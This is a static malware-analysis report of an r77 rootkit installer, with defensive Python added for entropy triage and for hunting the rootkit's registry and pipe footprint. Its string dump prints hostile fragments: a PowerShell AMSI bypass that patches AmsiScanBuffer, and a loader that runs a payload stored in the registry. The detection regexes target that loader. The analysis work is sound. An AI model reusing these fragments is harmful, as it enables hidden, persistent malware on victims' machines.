Static | ZeroBOX

PE Compile Time

2024-05-03 02:50:34

PE Imphash

eb3adbfdfdb25911eaec8fef643f639b

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x00000ba3    0x00000c00        5.98135665632
.rdata  0x00002000       0x00001c34    0x00001e00        3.81094378073
.rsrc   0x00004000       0x00025a38    0x00025c00        7.93546461728
.reloc  0x0002a000       0x000000e0    0x00000200        3.43253617999

Resources

Name         Offset      Size        Language      Sub-language        File type
EXE          0x000040b0  0x00025800  LANG_ENGLISH  SUBLANG_ENGLISH_US  PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
RT_MANIFEST  0x000298b0  0x00000188  LANG_ENGLISH  SUBLANG_ENGLISH_US  XML 1.0 document text
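The .rsrc section holds over 90% of the file's raw section bytes at an entropy of 7.94, and the EXE resource inside it is identified as a PE32 .NET assembly. Together with the imports (FindResourceA, LoadResource, LockResource, SizeofResource) and the managed strings further down (GZipStream, Decompress, Service32/Service64, Dll32/Dll64), this is the shape of a small native loader that pulls a managed stager out of its own resources, where that stager in turn carries compressed payloads. The Python below is an added example, not ZeroBOX code and not part of the sample; it performs the two checks an analyst runs on such a file: per-section Shannon entropy with a packed/compressed flag, and a scan of a section's bytes for an embedded PE, with a test of the CLR header data directory to tell a managed image from a native one. The PE it builds in memory is a constructed stand-in (the embedded image sits at section offset 0xB0, mirroring the 0x40b0 resource offset above, and the CLR header RVA it writes is hypothetical), not the binary described on this page.

```python
"""Section entropy and embedded-PE triage for a report like the one above.
Added example: not ZeroBOX code and not part of the analysed sample."""
import math
import random
import struct

PACKED_THRESHOLD = 7.0  # bits per byte; compressed or encrypted data sits near 8.0

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the figure in the Entropy column."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_sections(image: bytes):
    """Yield (name, virtual_address, virtual_size, raw_bytes) for each section."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size  # section headers follow the optional header
    for i in range(num_sections):
        off = table + 40 * i
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", image, off + 8)
        yield name, va, vsize, image[raw_ptr:raw_ptr + raw_size]

def section_report(image: bytes) -> list:
    """Per-section entropy plus a flag for sections that look packed or compressed."""
    report = []
    for name, va, vsize, data in pe_sections(image):
        ent = shannon_entropy(data)
        report.append({"name": name, "va": va, "vsize": vsize, "data": data,
                       "entropy": ent, "suspicious": ent > PACKED_THRESHOLD})
    return report

def find_embedded_pe(blob: bytes) -> list:
    """Offsets in blob where an MZ header's e_lfanew lands on a PE signature."""
    hits, pos = [], blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            if e_lfanew < 0x1000 and blob[pos + e_lfanew:pos + e_lfanew + 4] == b"PE\0\0":
                hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits

def is_dotnet(image: bytes) -> bool:
    """True when data directory 14 (the CLR runtime header) is populated."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", image, opt)[0]
    dirs = opt + (96 if magic == 0x10B else 112)  # PE32 vs PE32+ layout
    rva, size = struct.unpack_from("<II", image, dirs + 14 * 8)
    return rva != 0 and size != 0

def build_pe(sections, dotnet=False) -> bytes:
    """Assemble a minimal PE32 image from (name, data) pairs. Test fixture, not a linker."""
    align = 0x200
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<I", opt, 60, align)  # SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)  # NumberOfRvaAndSizes
    if dotnet:  # hypothetical CLR header RVA/size, just enough to mark the image managed
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 72)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    table, body, raw_ptr = bytearray(), bytearray(), align
    for i, (name, data) in enumerate(sections):
        raw_size = -(-len(data) // align) * align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data),
                             0x1000 * (i + 1), raw_size, raw_ptr, 0, 0, 0, 0, 0x40000040)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    headers = (dos + b"PE\0\0" + coff + opt + table).ljust(align, b"\0")
    return bytes(headers + body)

# Constructed stand-in for the sample (not the real file): a native loader whose .rsrc
# holds a managed PE at offset 0xB0, which itself carries a high-entropy resource.
_rng = random.Random(77)
INNER_MANAGED = build_pe([(".text", b"\x55\x8b\xec" * 200),
                          (".rsrc", bytes(_rng.getrandbits(8) for _ in range(0x6000)))],
                         dotnet=True)
SAMPLE_LOADER = build_pe([(".text", b"\x55\x8b\xec" * 300),
                          (".rsrc", b"\0" * 0xB0 + INNER_MANAGED)])

if __name__ == "__main__":
    for sec in section_report(SAMPLE_LOADER):
        flag = "  <- likely packed/compressed" if sec["suspicious"] else ""
        print(f"{sec['name']:<8} entropy={sec['entropy']:.2f}{flag}")
        for off in find_embedded_pe(sec["data"]):
            kind = ".NET" if is_dotnet(sec["data"][off:]) else "native"
            print(f"  embedded {kind} PE at section offset 0x{off:x}")
```

The entropy figure is computed over the raw section bytes, as in the table; a .rsrc section that is both the bulk of the file and above the 7.0 threshold is the cue to carve it, and the CLR directory check explains why the file-type column reports a Mono/.Net assembly for the carved resource.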

Imports

Library SHLWAPI.dll:
0x402060 StrNCatW
0x402064 StrStrIW
0x402068 StrCatW
0x40206c StrCpyW
Library KERNEL32.dll:
0x402018 SizeofResource
0x40201c GetCurrentProcess
0x402020 FindResourceA
0x402024 GetModuleHandleA
0x402028 LockResource
0x40202c GetProcAddress
0x402030 IsWow64Process
0x402034 ExitProcess
0x402038 GetProcessHeap
0x40203c HeapAlloc
0x402040 lstrlenW
0x402044 HeapFree
0x402048 LoadResource
Library ADVAPI32.dll:
0x402000 RegSetValueExW
0x402008 CryptGenRandom
0x40200c RegOpenKeyExW
0x402010 CryptReleaseContext
Library ole32.dll:
0x402078 CoCreateInstance
0x40207c CoUninitialize
0x402080 CoInitializeEx
Library OLEAUT32.dll:
0x402050 SysFreeString
0x402054 VariantInit
0x402058 SysAllocString

!This program cannot be run in DOS mode.
`.rdata
@.rsrc
@.reloc
t(h0"@
ntdll.dll
RtlGetVersion
.text$mn
.idata$5
.rdata
.rdata$voltmd
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
StrCpyW
StrCatW
StrStrIW
StrNCatW
SHLWAPI.dll
HeapFree
lstrlenW
HeapAlloc
GetProcessHeap
SizeofResource
GetCurrentProcess
FindResourceA
GetModuleHandleA
LockResource
LoadResource
GetProcAddress
IsWow64Process
ExitProcess
KERNEL32.dll
RegOpenKeyExW
CryptReleaseContext
CryptGenRandom
CryptAcquireContextW
RegSetValueExW
ADVAPI32.dll
CoUninitialize
CoCreateInstance
CoInitializeSecurity
CoInitializeEx
ole32.dll
OLEAUT32.dll
!This program cannot be run in DOS mode.
`.reloc
<jX(!
(ZjX(!
v2.0.50727
#Strings
get_Service32
get_Dll32
Microsoft.Win32
ToUInt32
ReadInt32
WriteInt32
ToInt32
get_Service64
get_Dll64
ReadInt64
WriteInt64
ToInt64
ReadInt16
ToInt16
<Module>
CreateFileA
MODULEINFO
System.IO
mscorlib
get_Id
parentProcessId
processId
GetProcessById
NtResumeThread
NtGetContextThread
NtSetContextThread
thread
payload
NewGuid
shareMode
EnterDebugMode
CompressionMode
SizeOfImage
IDisposable
GetModuleHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
inheritHandle
handle
templateFile
MapViewOfFile
module
fileName
moduleName
ControlPipeName
applicationName
GetProcessesByName
commandLine
LocalMachine
ValueType
allocationType
R77ServiceSignature
R77HelperSignature
get_Culture
set_Culture
resourceCulture
Dispose
Allocate
EditorBrowsableState
UpdateProcThreadAttribute
CompilerGeneratedAttribute
GeneratedCodeAttribute
UnverifiableCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
SecurityPermissionAttribute
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
attribute
ReadByte
previousValue
SetValue
Stager.exe
get_Size
returnSize
CreateFileMapping
ToString
maximumSizeHigh
fileOffsetHigh
Unhook
AllocHGlobal
Marshal
System.ComponentModel
BaseOfDll
UnhookDll
kernel32.dll
psapi.dll
ntdll.dll
msvcrt.dll
GZipStream
CopyStream
MemoryStream
stream
Program
OperatingSystem
resourceMan
bytesWritten
get_OSVersion
get_Version
System.IO.Compression
GetModuleInformation
processInformation
destination
System.Globalization
SecurityAction
NtUnmapViewOfSection
System.Reflection
SectionCharacteristicsToProtection
creationDisposition
Exception
moduleInfo
CultureInfo
startupInfo
numberOfBytesToMap
Buffer
buffer
get_ResourceManager
Stager
System.CodeDom.Compiler
Helper
BitConverter
get_Major
UIntPtr
WriteIntPtr
characteristics
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
Stager.Properties.Resources.resources
DebuggingModes
Stager.Properties
inheritHandles
threadAttributes
flagsAndAttributes
fileMappingAttributes
processAttributes
securityAttributes
GetBytes
creationFlags
System.Security.Permissions
desiredAccess
access
CreateProcess
OpenProcess
GetCurrentProcess
process
baseAddress
address
Decompress
zeroBits
Concat
fileMappingObject
GetObject
oldProtect
VirtualProtect
newProtect
protect
op_Explicit
Environment
environment
EntryPoint
suspendCount
attributeCount
Decrypt
InitializeProcThreadAttributeList
attributeList
R77Const
context
maximumSizeLow
fileOffsetLow
VirtualProtectEx
HidePrefix
ToArray
OpenSubKey
RegistryKey
get_Assembly
memcpy
BlockCopy
FreeLibrary
NtAllocateVirtualMemory
NtWriteVirtualMemory
currentDirectory
Registry
op_Equality
op_Inequality
System.Security
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
3System.Resources.Tools.StronglyTypedResourceBuilder
17.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
_W{wpm
{F+{M^0
~wl4C(
fm~xz/
%x% LB
BGbI@6
[Q/\|CA5
\\0m!h
4sv*4c
|iKLiK
J%v,xC&
KCOlQC7
/"3Ns~*GOj
d:8M&"
t"RQP/(s
3)5M::
qy-GF"
KiDnFscl
AaNo&!Z
P'4M-4J9
`OHz":B
-\!\5:o0~
=3-`$4
tRBIiz?_H
?](TRJ
kZfEiw=9
J~55/)
oSL(ob
u8+Oa8h
!QuRf>
/.}+<I'
/mLJAr
~nmDS5:g
,95p]@
a0MH.T
zLl)%l
`{<= Ncw0%
.jhd1E
o1g=ya
$ko"q'S5
m.GJ.p
G0E]OF
v>*;pB
W;BL0@
E-2kh6
6&ut{1
C~eS'5Z
.{FMB+
:Jgm=_u
SiR0.2
$}4D\j!
^p+bWlw
B$rrS^
%UA=o^QL
vPUkaS=
:p2Zm7
'aR@(_T
w;JSTnm/h
%!O*S#
ySO%~Oh
2u=T*gW_Y
Ksm:tyr1u
6OxKJZ
?p`8Z~
3aJl%4
h+^WP{
{+-&-
9 AUJ7
rQK`KN
0\R.X{
S^5Fe7
:se?aw
b4Rc4
)!8\`O
kSX2N-b6RC
b-5kmm
$SWS#]MM[
G/(&e
2`ZZfYz
}I}I~e
t^`-|#
fonnoC
-svNo
4'P&g)<
|e2+8"
|PJ[Gi
-"zW )
?pRq,
!u=e4]
4]nrq9e
MtYY0??
!\u44J
,cf1V1
xJ?I#I))
'QMRIB
2W2 k,
KRL"pJ
~Ec`u]
e,(-p-
DE*QJQ
8QQ4f[[
r#:LPe
%oQU"bn
w9/l<x
SD^!VS
iM!`5%
S;G<^S
&oL!YF
mW(`8h
(Y(`8 -
>F" X
r lSPy~uJ
>u}+y}K
KiE}:a
+BoEid{
<ZT$V-
Nwl/W*V
]C.Z^z
Fi;=i;
r6>wY
{g=:dm
ai[Vo+
.YLJsK
uUYXWm
,UOm}G+
p2h~1lc
/S+F8?
ws7Dln
2<MtJMT-
qY5$y~
^[6fWZk
m2>,-5
x?sckH
PA2S2T
P\lJ&#-
qTf|Go
O5(JXR
x]xvk
aw&gI(
G F?0Y
XuCp.!
F!]2nm7
GX/t{;.
Oz-APnzB
#"Kkz#
wxNB%?
UPA2KG]
gj\D{m
P#3Lh~0
DskqppHt
ai?-{m(
e%K$z
cQe*LZ
KZA(2[e
r.<O}\
0A IhsH[
c?*@"j
sA^;vT|K
Lkw,!KC
fGSZ!#
l<rG9O
Y?R-BRu
h_4ZO
F([ Ioq
Y]@s@c
>Wiu6*_
b<L:VFv:
V`AjP~
Lcyh~M
#@==L[
NL_|Y8
:^I4[=
('2:O1kp
96)Nki
}Pa:P9
9nrID
!&+nQkhb
M%zAHj
u4AmkE9
lXG6,#
SOa5*3
S[QrB.
ma!p.EX
N/h$Fg
?%H|hGS
)dA[vT%
e=cdN`@
:;,NR\
LJjh`C
N2]y%j
XXV(u`
6!(]R#
#9A@EH
;Y$uYNS
EUCAh?
y yz+xr54
RR",,%W{R/=@
BlE`C]
M-)OHr
L5]qSA[
&j5r@1D
xs@8$3!"
bBj(w
"@U^@P
XCpl#@b
xgqg|G
-K)C{=}c
Yms[kV
c:UttDT
SeWYUf
JZI*q%
RZJJq)*
ZRSjHui
eySNIY
gEy@<l
^{tM:'
X/I\z.#
_aX@P$`,
E(*M+J;
FZ1E5E&
%!KRSu
r<G(N-.
T"B_%A
|qK*(G
_X/'RdO
qY-FV)
Q^f9 u
mat#%<
HeM{!/5
OxsnGs
ghhj<Hk2\
/st,{M
XL6mhr
?wQkoZ
_CorExeMain
mscoree.dll
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0 0/0;0]0?1F1
222:2@2R2G3
4$515A5[5v5~5
6[6a6~6
8(868t8{8
9!9-999E9Q9]9i9u9
:;:H:N:e:o:
;B;S;c;~;
Microsoft Base Cryptographic Provider v1.0
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
SYSTEM
ESOFTWARE
$77stager
$77svc32
$77svc64
powershell
function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]$ReturnType)$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(`ReflectedDelegate`)),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(`InMemoryModule`,$False).DefineType(`MyDelegateType`,`Class,Public,Sealed,AnsiClass,AutoClass`,[MulticastDelegate]);$TypeBuilder.DefineConstructor(`RTSpecialName,HideBySig,Public`,[Reflection.CallingConventions]::Standard,$ParameterTypes).SetImplementationFlags(`Runtime,Managed`);$TypeBuilder.DefineMethod(`Invoke`,`Public,HideBySig,NewSlot,Virtual`,$ReturnType,$ParameterTypes).SetImplementationFlags(`Runtime,Managed`);Write-Output $TypeBuilder.CreateType();}$NativeMethods=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(`System.dll`)}).GetType(`Microsoft.Win32.UnsafeNativeMethods`);$GetProcAddress=$NativeMethods.GetMet
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);
[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBufferPtr,[uint32]8,0x20,[ref]$OldProtect);
[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$77stager`)).EntryPoint.Invoke($Null,$Null)
Get-Delegate
ParameterTypes
ReturnType
TypeBuilder
NativeMethods
GetProcAddress
LoadLibraryDelegate
VirtualProtectDelegate
Kernel32Ptr
LoadLibraryPtr
VirtualProtectPtr
AmsiPtr
AmsiScanBufferPtr
OldProtect
'+[Char](
ntdll.dll
kernel32.dll
SOFTWARE
$77dll32
$77dll64
C:\Windows\System32\dllhost.exe
/Processid:
winlogon
C:\Windows\System32\
Stager.Properties.Resources
Service32
Service64
$77control
Service32
Service64
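The strings SOFTWARE, $77stager, $77svc32/$77svc64, $77dll32/$77dll64 and $77control, together with the bootstrap that reads $77stager out of HKLM\SOFTWARE, give a concrete hunting target: registry values and a named pipe whose names carry the rootkit's hide prefix (HidePrefix in the managed strings). Because r77 hides objects with that prefix on an infected host, a live query from the host itself may come back empty; the Python below, an added example that is not part of this report or of r77, runs the same check over offline artefacts instead: a .reg export, captured command lines and a pipe listing. All three inputs are constructed samples with placeholder payload bytes.

```python
"""Hunt for the stager's registry and pipe footprint in offline artefacts.
Added example: not part of the report and not r77 code."""
import re

HIDE_PREFIX = "$77"  # r77 hides files, processes, registry values and pipes named with this
KEY_RE = re.compile(r"^\[(HKEY_[^\]]+)\]\s*$")
VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')
# The bootstrap quoted above: load an assembly straight out of HKLM\SOFTWARE\$77<name>.
PS_LOADER_RE = re.compile(
    r"Reflection\.Assembly\]::Load\(.*Registry\]::LocalMachine\.OpenSubkey\(.SOFTWARE.\)"
    r"\.GetValue\(.\$77\w+.\)", re.IGNORECASE)

def has_hide_prefix(name: str) -> bool:
    """True for any object name (value, file, pipe leaf) that r77 would hide."""
    return name.rsplit("\\", 1)[-1].startswith(HIDE_PREFIX)

def scan_reg_export(text: str) -> list:
    """(key, value name, kind) for each value in a .reg export that carries the prefix."""
    hits, key = [], None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and has_hide_prefix(m.group(1)):
            kind = "binary" if m.group(2).startswith("hex") else "string"
            hits.append((key, m.group(1), kind))
    return hits

def scan_command_lines(lines) -> list:
    """Command lines that run the registry-resident stager through PowerShell."""
    return [line for line in lines if PS_LOADER_RE.search(line)]

def scan_pipe_names(names) -> list:
    """Pipe names whose leaf carries the prefix, e.g. $77control."""
    return [n for n in names if has_hide_prefix(n)]

# Constructed samples: a .reg export of HKLM\SOFTWARE after the stager ran, two
# command lines and two pipe names. Payload bytes are truncated placeholders.
REG_SAMPLE = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE]
"$77stager"=hex:4d,5a,90,00,03,00,00,00
"$77svc32"=hex:4d,5a,90,00
"$77svc64"=hex:4d,5a,90,00
"$77dll32"=hex:4d,5a,90,00
"$77dll64"=hex:4d,5a,90,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Contoso]
"InstallPath"="C:\\Program Files\\Contoso"
"""
COMMAND_LINES = [
    r'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"',
    r"powershell -c [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine"
    r".OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)",
]
PIPE_NAMES = [r"\\.\pipe\lsass", r"\\.\pipe\$77control"]

if __name__ == "__main__":
    for key, name, kind in scan_reg_export(REG_SAMPLE):
        print(f"{key}\\{name} ({kind})")
    print(scan_command_lines(COMMAND_LINES))
    print(scan_pipe_names(PIPE_NAMES))
```

Take the .reg export from a mounted disk image or an offline hive rather than from the running host, for the hiding reason above; the command-line and pipe checks work on EDR telemetry or memory-forensics output the same way.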
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Rootkit.4!c
tehtris Generic.Malware
ClamAV Win.Rootkit.R77-10009366-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win32.Ransom.cc
ALYac Gen:Variant.Lazy.387335
Cylance Unsafe
Zillya Rootkit.Agent.Win32.52203
Sangfor Trojan.Win32.Save.a
K7AntiVirus RootKit ( 005aee0e1 )
Alibaba Rootkit:Win32/InjectorX.ba82b0ff
K7GW RootKit ( 005aee0e1 )
Cybereason malicious.d24ba3
huorong HackTool/HideProc.a
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic Windows.Rootkit.R77
ESET-NOD32 a variant of Win32/Rootkit.Agent.OEM
APEX Malicious
Avast Win32:InjectorX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Gen:Variant.Lazy.387335
NANO-Antivirus Trojan.Win32.Banker1.kmjqja
ViRobot Clean
MicroWorld-eScan Gen:Variant.Lazy.387335
Tencent Malware.Win32.Gencirc.10c0232f
TACHYON Clean
Sophos Troj/MSIL-TDK
F-Secure Trojan.TR/Dropper.MSIL.Gen
DrWeb Trojan.PWS.Banker1.37402
VIPRE Gen:Variant.Lazy.387335
TrendMicro TROJ_GEN.R002C0DE324
McAfeeD Real Protect-LS!1A7D1B5D24BA
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.1a7d1b5d24ba30c4
Emsisoft Gen:Variant.Lazy.387335 (B)
Ikarus Trojan.MSIL.Injector
GData Gen:Variant.Lazy.387335
Jiangmin Trojan.Generic.hrmyw
Webroot W32.Trojan.Gen
Varist W32/MSIL_Agent.HNK.gen!Eldorado
Avira TR/Dropper.MSIL.Gen
Antiy-AVL Trojan/MSIL.Zusy
Kingsoft malware.kb.a.999
Gridinsoft Trojan.Win32.Downloader.sa
Xcitium Malware@#25rj5z8bd4hqy
Arcabit Trojan.Lazy.D5E907
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Microsoft Trojan:MSIL/Zusy.KA!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.R630595
Acronis suspicious
McAfee Artemis!1A7D1B5D24BA
MAX malware (ai score=84)
VBA32 BScope.Trojan.MSIL.VOF
Malwarebytes Rootkit.r77
Panda Trj/Genetic.gen
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0DE324
Rising Rootkit.Agent!8.F5 (TFE:3:Ma4kQLHBcuO)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.7164915.susgen
Fortinet W32/Agent.OEM!tr.rkit
BitDefenderTheta Gen:NN.ZexaF.36810.kqW@aihwR!ei
AVG Win32:InjectorX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Trojan[dropper]:Win/Zusy.KM8PHU
No IRMA results available.